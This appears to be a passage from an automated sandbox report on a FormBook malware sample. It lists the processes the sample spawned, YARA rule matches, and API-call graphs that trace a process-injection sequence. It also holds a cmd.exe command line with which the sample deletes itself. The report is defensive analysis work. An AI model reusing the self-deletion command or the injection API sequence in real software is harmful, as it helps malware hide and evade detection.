            Wow64 process (32bit):false
            Commandline:"C:\Windows\SysWOW64\autofmt.exe"
            Imagebase:0xb90000
            File size:822'272 bytes
            MD5 hash:C72D80A976B7EB40534E8464957A979F
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            General

            Target ID:6
            Start time:06:09:05
            Start date:10/07/2024
            Path:C:\Windows\SysWOW64\netsh.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\SysWOW64\netsh.exe"
            Imagebase:0x1560000
            File size:82'432 bytes
            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high
            Has exited:false

            General

            Target ID:7
            Start time:06:09:08
            Start date:10/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:8
            Start time:06:09:08
            Start date:10/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:11.8%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:4.7%
              Total number of Nodes:192
              Total number of Limit Nodes:20
              execution_graph 37039 749d188 37040 749d1d0 WriteProcessMemory 37039->37040 37042 749d227 37040->37042 37043 749d0c8 37044 749d108 VirtualAllocEx 37043->37044 37046 749d145 37044->37046 37102 749f478 37103 749f603 37102->37103 37105 749f49e 37102->37105 37105->37103 37106 7496150 37105->37106 37107 749fb00 PostMessageW 37106->37107 37108 749fb6c 37107->37108 37108->37105 37109 749d278 37110 749d2c3 ReadProcessMemory 37109->37110 37112 749d307 37110->37112 37113 e4d01c 37114 e4d034 37113->37114 37115 e4d08e 37114->37115 37126 50c2c08 37114->37126 37135 50c0aa8 37114->37135 37144 50c0a48 37114->37144 37153 50c192e 37114->37153 37162 50c1a5c 37114->37162 37171 50c0a60 37114->37171 37180 50c0a10 37114->37180 37189 50c1e47 37114->37189 37198 50c1ce5 37114->37198 37207 50c0ad4 37114->37207 37128 50c2c18 37126->37128 37127 50c2c79 37131 50c2c77 37127->37131 37232 50c0bfc 37127->37232 37128->37127 37130 50c2c69 37128->37130 37216 50c2e6c 37130->37216 37222 50c2da0 37130->37222 37227 50c2d90 37130->37227 37137 50c1cf0 37135->37137 37136 50c2c79 37138 50c0bfc CallWindowProcW 37136->37138 37140 50c2c77 37136->37140 37137->37136 37139 50c2c69 37137->37139 37138->37140 37141 50c2e6c CallWindowProcW 37139->37141 37142 50c2d90 CallWindowProcW 37139->37142 37143 50c2da0 CallWindowProcW 37139->37143 37140->37140 37141->37140 37142->37140 37143->37140 37146 50c1930 37144->37146 37145 50c2c79 37147 50c0bfc CallWindowProcW 37145->37147 37149 50c2c77 37145->37149 37146->37145 37148 50c2c69 37146->37148 37147->37149 37150 50c2e6c CallWindowProcW 37148->37150 37151 50c2d90 CallWindowProcW 37148->37151 37152 50c2da0 CallWindowProcW 37148->37152 37149->37149 37150->37149 37151->37149 37152->37149 37155 50c198c 37153->37155 37154 50c2c79 37156 50c0bfc CallWindowProcW 37154->37156 37158 50c2c77 37154->37158 37155->37154 37157 50c2c69 37155->37157 37156->37158 37159 50c2e6c CallWindowProcW 37157->37159 37160 50c2d90 CallWindowProcW 37157->37160 37161 50c2da0 CallWindowProcW 37157->37161 37158->37158 37159->37158 37160->37158 37161->37158 37163 50c1a6a 37162->37163 37164 50c2c79 37163->37164 37166 50c2c69 37163->37166 37165 50c0bfc CallWindowProcW 37164->37165 37167 50c2c77 37164->37167 37165->37167 37168 50c2e6c CallWindowProcW 37166->37168 37169 50c2d90 CallWindowProcW 37166->37169 37170 50c2da0 CallWindowProcW 37166->37170 37167->37167 37168->37167 37169->37167 37170->37167 37175 50c0a65 37171->37175 37172 50c2c79 37173 50c0bfc CallWindowProcW 37172->37173 37176 50c2c77 37172->37176 37173->37176 37174 50c2c69 37177 50c2e6c CallWindowProcW 37174->37177 37178 50c2d90 CallWindowProcW 37174->37178 37179 50c2da0 CallWindowProcW 37174->37179 37175->37172 37175->37174 37176->37176 37177->37176 37178->37176 37179->37176 37182 50c0a15 37180->37182 37181 50c2c79 37183 50c0bfc CallWindowProcW 37181->37183 37185 50c2c77 37181->37185 37182->37181 37184 50c2c69 37182->37184 37183->37185 37186 50c2e6c CallWindowProcW 37184->37186 37187 50c2d90 CallWindowProcW 37184->37187 37188 50c2da0 CallWindowProcW 37184->37188 37185->37185 37186->37185 37187->37185 37188->37185 37190 50c1e55 37189->37190 37191 50c2c79 37190->37191 37193 50c2c69 37190->37193 37192 50c0bfc CallWindowProcW 37191->37192 37194 50c2c77 37191->37194 37192->37194 37195 50c2e6c CallWindowProcW 37193->37195 37196 50c2d90 CallWindowProcW 37193->37196 37197 50c2da0 CallWindowProcW 37193->37197 37194->37194 37195->37194 37196->37194 37197->37194 37199 50c1d58 37198->37199 37200 50c2c79 37199->37200 37202 50c2c69 37199->37202 37201 50c0bfc CallWindowProcW 37200->37201 37203 50c2c77 37200->37203 37201->37203 37204 50c2e6c CallWindowProcW 37202->37204 37205 50c2d90 CallWindowProcW 37202->37205 37206 50c2da0 CallWindowProcW 37202->37206 37203->37203 37204->37203 37205->37203 37206->37203 37208 50c0adf 37207->37208 37209 50c2c79 37208->37209 37211 50c2c69 37208->37211 37210 50c0bfc CallWindowProcW 37209->37210 37212 50c2c77 37209->37212 37210->37212 37213 50c2e6c CallWindowProcW 37211->37213 37214 50c2d90 CallWindowProcW 37211->37214 37215 50c2da0 CallWindowProcW 37211->37215 37212->37212 37213->37212 37214->37212 37215->37212 37217 50c2e2a 37216->37217 37218 50c2e7a 37216->37218 37236 50c2e58 37217->37236 37239 50c2e4a 37217->37239 37219 50c2e40 37219->37131 37223 50c2db4 37222->37223 37225 50c2e58 CallWindowProcW 37223->37225 37226 50c2e4a CallWindowProcW 37223->37226 37224 50c2e40 37224->37131 37225->37224 37226->37224 37229 50c2da0 37227->37229 37228 50c2e40 37228->37131 37230 50c2e58 CallWindowProcW 37229->37230 37231 50c2e4a CallWindowProcW 37229->37231 37230->37228 37231->37228 37233 50c0c07 37232->37233 37234 50c4309 37233->37234 37235 50c435a CallWindowProcW 37233->37235 37234->37131 37235->37234 37237 50c2e69 37236->37237 37243 50c4292 37236->37243 37237->37219 37240 50c2e58 37239->37240 37241 50c2e69 37240->37241 37242 50c4292 CallWindowProcW 37240->37242 37241->37219 37242->37241 37244 50c0bfc CallWindowProcW 37243->37244 37245 50c42aa 37244->37245 37245->37237 37047 749cf40 37048 749cf80 ResumeThread 37047->37048 37050 749cfb1 37048->37050 37051 749d410 37052 749d499 CreateProcessA 37051->37052 37054 749d65b 37052->37054 37054->37054 37246 749cff0 37247 749d035 Wow64SetThreadContext 37246->37247 37249 749d07d 37247->37249 37055 297b038 37059 297b130 37055->37059 37067 297b11f 37055->37067 37056 297b047 37060 297b141 37059->37060 37061 297b164 37059->37061 37060->37061 37075 297b3b8 37060->37075 37079 297b3c8 37060->37079 37061->37056 37062 297b15c 37062->37061 37063 297b368 GetModuleHandleW 37062->37063 37064 297b395 37063->37064 37064->37056 37068 297b141 37067->37068 37069 297b164 37067->37069 37068->37069 37073 297b3b8 LoadLibraryExW 37068->37073 37074 297b3c8 LoadLibraryExW 37068->37074 37069->37056 37070 297b15c 37070->37069 37071 297b368 GetModuleHandleW 37070->37071 37072 297b395 37071->37072 37072->37056 37073->37070 37074->37070 37076 297b3c8 37075->37076 37077 297b401 37076->37077 37083 297ab70 37076->37083 37077->37062 37080 297b3dc 37079->37080 37081 297b401 37080->37081 37082 297ab70 LoadLibraryExW 37080->37082 37081->37062 37082->37081 37084 297b5a8 LoadLibraryExW 37083->37084 37086 297b621 37084->37086 37086->37077 37087 297d3b8 37088 297d3fe 37087->37088 37092 297d598 37088->37092 37095 297d588 37088->37095 37089 297d4eb 37099 297cca0 37092->37099 37096 297d598 37095->37096 37097 297cca0 DuplicateHandle 37096->37097 37098 297d5c6 37097->37098 37098->37089 37100 297d600 DuplicateHandle 37099->37100 37101 297d5c6 37100->37101 37101->37089 37250 2974668 37251 297467a 37250->37251 37252 2974686 37251->37252 37254 2974778 37251->37254 37255 297479d 37254->37255 37259 2974879 37255->37259 37263 2974888 37255->37263 37260 2974888 37259->37260 37261 297498c 37260->37261 37267 29744b4 37260->37267 37264 29748af 37263->37264 37265 29744b4 CreateActCtxA 37264->37265 37266 297498c 37264->37266 37265->37266 37268 2975918 CreateActCtxA 37267->37268 37270 29759db 37268->37270

              Executed Functions

              Function 0749D410 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1487 749d410-749d4a5 1489 749d4de-749d4fe 1487->1489 1490 749d4a7-749d4b1 1487->1490 1495 749d500-749d50a 1489->1495 1496 749d537-749d566 1489->1496 1490->1489 1491 749d4b3-749d4b5 1490->1491 1493 749d4d8-749d4db 1491->1493 1494 749d4b7-749d4c1 1491->1494 1493->1489 1497 749d4c3 1494->1497 1498 749d4c5-749d4d4 1494->1498 1495->1496 1499 749d50c-749d50e 1495->1499 1506 749d568-749d572 1496->1506 1507 749d59f-749d659 CreateProcessA 1496->1507 1497->1498 1498->1498 1500 749d4d6 1498->1500 1501 749d531-749d534 1499->1501 1502 749d510-749d51a 1499->1502 1500->1493 1501->1496 1504 749d51c 1502->1504 1505 749d51e-749d52d 1502->1505 1504->1505 1505->1505 1508 749d52f 1505->1508 1506->1507 1509 749d574-749d576 1506->1509 1518 749d65b-749d661 1507->1518 1519 749d662-749d6e8 1507->1519 1508->1501 1511 749d599-749d59c 1509->1511 1512 749d578-749d582 1509->1512 1511->1507 1513 749d584 1512->1513 1514 749d586-749d595 1512->1514 1513->1514 1514->1514 1515 749d597 1514->1515 1515->1511 1518->1519 1529 749d6f8-749d6fc 1519->1529 1530 749d6ea-749d6ee 1519->1530 1532 749d70c-749d710 1529->1532 1533 749d6fe-749d702 1529->1533 1530->1529 1531 749d6f0 1530->1531 1531->1529 1535 749d720-749d724 1532->1535 1536 749d712-749d716 1532->1536 1533->1532 1534 749d704 1533->1534 1534->1532 1538 749d736-749d73d 1535->1538 1539 749d726-749d72c 1535->1539 1536->1535 1537 749d718 1536->1537 1537->1535 1540 749d73f-749d74e 1538->1540 1541 749d754 1538->1541 1539->1538 1540->1541 1543 749d755 1541->1543 1543->1543
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D646
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 28e076635467d96318c83c3d4e5d67bd2abee3b04b51f236aa5987633fbc49bc
              • Instruction ID: cef66778235114d0d82b379d1f7ff123bb68edd76c7cff7d15d71714fd365652
              • Opcode Fuzzy Hash: 28e076635467d96318c83c3d4e5d67bd2abee3b04b51f236aa5987633fbc49bc
              • Instruction Fuzzy Hash: C8916DB1E0061ADFDF14DF68C940BDEBBB2BF48314F1485AAD849A7240DB749985CF92
              Function 0749D40A Relevance: 1.7, APIs: 1, Instructions: 242processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1544 749d40a-749d4a5 1546 749d4de-749d4fe 1544->1546 1547 749d4a7-749d4b1 1544->1547 1552 749d500-749d50a 1546->1552 1553 749d537-749d566 1546->1553 1547->1546 1548 749d4b3-749d4b5 1547->1548 1550 749d4d8-749d4db 1548->1550 1551 749d4b7-749d4c1 1548->1551 1550->1546 1554 749d4c3 1551->1554 1555 749d4c5-749d4d4 1551->1555 1552->1553 1556 749d50c-749d50e 1552->1556 1563 749d568-749d572 1553->1563 1564 749d59f-749d659 CreateProcessA 1553->1564 1554->1555 1555->1555 1557 749d4d6 1555->1557 1558 749d531-749d534 1556->1558 1559 749d510-749d51a 1556->1559 1557->1550 1558->1553 1561 749d51c 1559->1561 1562 749d51e-749d52d 1559->1562 1561->1562 1562->1562 1565 749d52f 1562->1565 1563->1564 1566 749d574-749d576 1563->1566 1575 749d65b-749d661 1564->1575 1576 749d662-749d6e8 1564->1576 1565->1558 1568 749d599-749d59c 1566->1568 1569 749d578-749d582 1566->1569 1568->1564 1570 749d584 1569->1570 1571 749d586-749d595 1569->1571 1570->1571 1571->1571 1572 749d597 1571->1572 1572->1568 1575->1576 1586 749d6f8-749d6fc 1576->1586 1587 749d6ea-749d6ee 1576->1587 1589 749d70c-749d710 1586->1589 1590 749d6fe-749d702 1586->1590 1587->1586 1588 749d6f0 1587->1588 1588->1586 1592 749d720-749d724 1589->1592 1593 749d712-749d716 1589->1593 1590->1589 1591 749d704 1590->1591 1591->1589 1595 749d736-749d73d 1592->1595 1596 749d726-749d72c 1592->1596 1593->1592 1594 749d718 1593->1594 1594->1592 1597 749d73f-749d74e 1595->1597 1598 749d754 1595->1598 1596->1595 1597->1598 1600 749d755 1598->1600 1600->1600
              APIs
              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0749D646
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 88801660c0b200b734457ee6085eabc2edea6a0b4d63b96b1201c0a6cf8ec099
              • Instruction ID: 3256b8d0c26914b5331863b6b6375c0ce28ad12f631c87b0e3ce013282de6bc1
              • Opcode Fuzzy Hash: 88801660c0b200b734457ee6085eabc2edea6a0b4d63b96b1201c0a6cf8ec099
              • Instruction Fuzzy Hash: 01916DB1E0061ADFDF14CF68C9407EEBBB2BF48314F1485AAD849A7240DB749985CF92
              Function 0297B130 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1601 297b130-297b13f 1602 297b141-297b14e call 2978680 1601->1602 1603 297b16b-297b16f 1601->1603 1608 297b164 1602->1608 1609 297b150 1602->1609 1605 297b183-297b1c4 1603->1605 1606 297b171-297b17b 1603->1606 1612 297b1c6-297b1ce 1605->1612 1613 297b1d1-297b1df 1605->1613 1606->1605 1608->1603 1656 297b156 call 297b3b8 1609->1656 1657 297b156 call 297b3c8 1609->1657 1612->1613 1614 297b203-297b205 1613->1614 1615 297b1e1-297b1e6 1613->1615 1619 297b208-297b20f 1614->1619 1617 297b1f1 1615->1617 1618 297b1e8-297b1ef call 297ab14 1615->1618 1616 297b15c-297b15e 1616->1608 1620 297b2a0-297b360 1616->1620 1621 297b1f3-297b201 1617->1621 1618->1621 1623 297b211-297b219 1619->1623 1624 297b21c-297b223 1619->1624 1651 297b362-297b365 1620->1651 1652 297b368-297b393 GetModuleHandleW 1620->1652 1621->1619 1623->1624 1626 297b225-297b22d 1624->1626 1627 297b230-297b239 call 297ab24 1624->1627 1626->1627 1632 297b246-297b24b 1627->1632 1633 297b23b-297b243 1627->1633 1634 297b24d-297b254 1632->1634 1635 297b269-297b276 1632->1635 1633->1632 1634->1635 1637 297b256-297b266 call 297ab34 call 297ab44 1634->1637 1642 297b299-297b29f 1635->1642 1643 297b278-297b296 1635->1643 1637->1635 1643->1642 1651->1652 1653 297b395-297b39b 1652->1653 1654 297b39c-297b3b0 1652->1654 1653->1654 1656->1616 1657->1616
              APIs
              • GetModuleHandleW.KERNELBASE(00000000), ref: 0297B386
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: HandleModule
              • String ID:
              • API String ID: 4139908857-0
              • Opcode ID: a9a60823d183f401612d56ca27235c795a669e7da19dc4137b946209dc410758
              • Instruction ID: a4a5c75132dbc3bcb1174e3cac0d772b19600b531fdd9adfaccb3ad5cd15ebe4
              • Opcode Fuzzy Hash: a9a60823d183f401612d56ca27235c795a669e7da19dc4137b946209dc410758
              • Instruction Fuzzy Hash: F57143B0A00B058FD724DF69D55575ABBF6FF88308F008A2DE08ADBA50DB34E945CB90
              Function 050C0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1766 50c0bfc-50c42fc 1769 50c43ac-50c43cc call 50c0ad4 1766->1769 1770 50c4302-50c4307 1766->1770 1777 50c43cf-50c43dc 1769->1777 1772 50c4309-50c4340 1770->1772 1773 50c435a-50c4392 CallWindowProcW 1770->1773 1779 50c4349-50c4358 1772->1779 1780 50c4342-50c4348 1772->1780 1774 50c439b-50c43aa 1773->1774 1775 50c4394-50c439a 1773->1775 1774->1777 1775->1774 1779->1777 1780->1779
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 050C4381
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID:
              • API String ID: 2714655100-0
              • Opcode ID: 31f3be69c70676d486650a763c06925e8f415de708c5ee7d617f903e09b91b5c
              • Instruction ID: 50527f70274e54092af1d0e23b923cd3869d2979371573d4a8a31144a5b88a49
              • Opcode Fuzzy Hash: 31f3be69c70676d486650a763c06925e8f415de708c5ee7d617f903e09b91b5c
              • Instruction Fuzzy Hash: 5C4108B49002058FCB14CF99D898AAEBBF5FB89315F24C599D519AB321D774A841CFA0
              Function 029744B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1783 29744b4-29759d9 CreateActCtxA 1786 29759e2-2975a3c 1783->1786 1787 29759db-29759e1 1783->1787 1794 2975a3e-2975a41 1786->1794 1795 2975a4b-2975a4f 1786->1795 1787->1786 1794->1795 1796 2975a51-2975a5d 1795->1796 1797 2975a60-2975a90 1795->1797 1796->1797 1801 2975a42-2975a44 1797->1801 1802 2975a92-2975b14 1797->1802 1801->1795
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 029759C9
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: 645cc956e53ba90ba7f7ec719087223fe77232e00d49ce9b1f28a00452cf8311
              • Instruction ID: ece1b6ce2bdcd407077b1ddc9982ff4b4b5e9ff43f0a801278c0a7f1558870c9
              • Opcode Fuzzy Hash: 645cc956e53ba90ba7f7ec719087223fe77232e00d49ce9b1f28a00452cf8311
              • Instruction Fuzzy Hash: AA41D2B0C00719CFDB24CFAAC884B9DBBF5BF49304F6480AAD408AB255DB755945CF90
              Function 0297590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1804 297590c-2975912 1805 2975918-29759d9 CreateActCtxA 1804->1805 1807 29759e2-2975a3c 1805->1807 1808 29759db-29759e1 1805->1808 1815 2975a3e-2975a41 1807->1815 1816 2975a4b-2975a4f 1807->1816 1808->1807 1815->1816 1817 2975a51-2975a5d 1816->1817 1818 2975a60-2975a90 1816->1818 1817->1818 1822 2975a42-2975a44 1818->1822 1823 2975a92-2975b14 1818->1823 1822->1816
              APIs
              • CreateActCtxA.KERNEL32(?), ref: 029759C9
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: Create
              • String ID:
              • API String ID: 2289755597-0
              • Opcode ID: f367dd917ff0452e907b6fa5ce6f720497100bfcd830deb657119bc29f119c75
              • Instruction ID: 73167ab3bf5d8b65cdf51cacd4d84ca9b6103ed9c05c38e06b79654c6950a6df
              • Opcode Fuzzy Hash: f367dd917ff0452e907b6fa5ce6f720497100bfcd830deb657119bc29f119c75
              • Instruction Fuzzy Hash: 1F41B2B1C00619CFDB24CFAAC984B8EBBF5BF49704F64806AD408AB255DB756946CF90
              Function 0749D188 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
              Download Yara Rule
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D218
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 96493eeb4b968fc3badc542424aa65d64591a826390bb751ed9409c5cacab2e0
              • Instruction ID: f5b7876d4d61f4c0877be158fd5d407981042641a880c9cd5ebe0f556109af18
              • Opcode Fuzzy Hash: 96493eeb4b968fc3badc542424aa65d64591a826390bb751ed9409c5cacab2e0
              • Instruction Fuzzy Hash: CF2124B59003599FCB10CFAAC885BDEBBF5FF48310F10882AE959A7250C7789944CFA4
              Function 0749D180 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1825 749d180-749d1d6 1827 749d1d8-749d1e4 1825->1827 1828 749d1e6-749d225 WriteProcessMemory 1825->1828 1827->1828 1830 749d22e-749d25e 1828->1830 1831 749d227-749d22d 1828->1831 1831->1830
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0749D218
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: d5a3f2a783bbcde5cd45aee4f97f909cd21b0a5b39355514639abff8ac8009e5
              • Instruction ID: b5c9df49e1a67f00eac083d405cd6ab898d875c2ef25fc97bcb6db1f46b76958
              • Opcode Fuzzy Hash: d5a3f2a783bbcde5cd45aee4f97f909cd21b0a5b39355514639abff8ac8009e5
              • Instruction Fuzzy Hash: 9F2137B59002199FCF00CFA9C985BDEBBF1FF48310F10842AE519A7251C7749555CFA4
              Function 0297CCA0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0297D5C6,?,?,?,?,?), ref: 0297D687
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: bd621b35ecf494a19f04cc564000c3fbdb46060f9f2cf885783db8eee663eba4
              • Instruction ID: 044a3f74dc1085b3f3baf962aaa5825239d7448b9900a9917e9089e4c60ca227
              • Opcode Fuzzy Hash: bd621b35ecf494a19f04cc564000c3fbdb46060f9f2cf885783db8eee663eba4
              • Instruction Fuzzy Hash: D521E6B5900348DFDB10CF9AD584AEEBBF4EF48310F14845AE918A7310D374A940CFA4
              Function 0749D271 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
              Download Yara Rule
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0749D2F8
              Memory Dump Source
              • Source File: 00000000.00000002.1704650898.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7490000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: bc23093e62854801be2bb5c5b3edcd57f9c96577404a026e9c41ac5f2664c5b2
              • Instruction ID: c16b006632203620cae5d1198d50c5e0ac977b9dc6e65037f224e273d034ab60
              • Opcode Fuzzy Hash: bc23093e62854801be2bb5c5b3edcd57f9c96577404a026e9c41ac5f2664c5b2
              • Instruction Fuzzy Hash: AF2134B6D002599FCB10CFA9C980BEEBBF1FF48320F10882AE519A7250D7789545CFA0
              Function 0297D5FA Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0297D5C6,?,?,?,?,?), ref: 0297D687
              Memory Dump Source
              • Source File: 00000000.00000002.1700878260.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2970000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: ccb4e47cda2b5ea7e610ff9c9cb72657a9232fb06cae00b631ac80c83369c400
              • Instruction ID: 1cf43e1c9ab7428ba3a76c59b79674c74af8d9af66fbaf870df0837944c0fa66
              • Opcode Fuzzy Hash: ccb4e47cda2b5ea7e610ff9c9cb72657a9232fb06cae00b631ac80c83369c400
              • Instruction Fuzzy Hash: 7021B3B59002589FDB10CF9AD984ADEBBF8FB48314F14841AE958A7350D374A944CFA5
